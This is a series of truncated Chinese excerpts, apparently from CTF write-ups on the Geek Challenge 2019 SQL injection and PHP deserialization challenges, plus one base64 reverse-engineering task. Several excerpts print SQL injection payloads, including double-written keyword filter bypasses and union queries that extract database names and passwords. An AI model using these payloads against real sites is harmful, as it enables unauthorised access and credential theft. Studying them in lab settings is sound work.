接下来与 "[极客大挑战 2019]LoveSQL" 一致,对数据库进行查询即可。(这里找了一下 SQLMap 的双写绕过 tamper,但是失败了)。 查询当前存在什么数据库。 Payload:admin'+ununionion+seselectlect+1,2,group_concat(schema_name)+frofromm+infoorrmation_schema.schemata%3b%23。 查询"b4bsql" 数据表中存在什么字...
username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23 然后我们的flag就呈现到自己的面前了,
登录成功获得用户名和密码,发现密码并没有卵用,只能换思路利用账号密码的回显页面进行sql注入爆破数据库 由于网站自动转义,为了方便观看过程所以这里直接用登录界面演示 admin ' and 1 = 2 order by 4#出现报错信息 说明数据库有3个字段 `admin' and 1 = 2 union select 1 ,2,3# ' 获得回显位2,3 获得当...
exe 文件,无壳,拖进 ida, 一个长度为60的数组,两个重要函数enc0,enc1; 点进enc0,一看就是 base64,在看看表,没有换表, 代码语言:javascript 复制 .rdata:0000000000405000aAbcdefghijklmn db'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0 再进入enc1,就是把 base64 之后的密文在进行一...
摘要:[极客大挑战 2019]PHP 知识点: 1.网站的备份文件:www.zip 2.Php 反序列化漏洞:当反序列化字符串时,如果表示属性个数的值大于真实属性个数,就会跳过_wakeup函数的执行 备份泄露,应该可以用工具扫目录扫出来,但是不知道为什么用御剑和dirbuster都扫不出来。直接在url阅读全文 » ...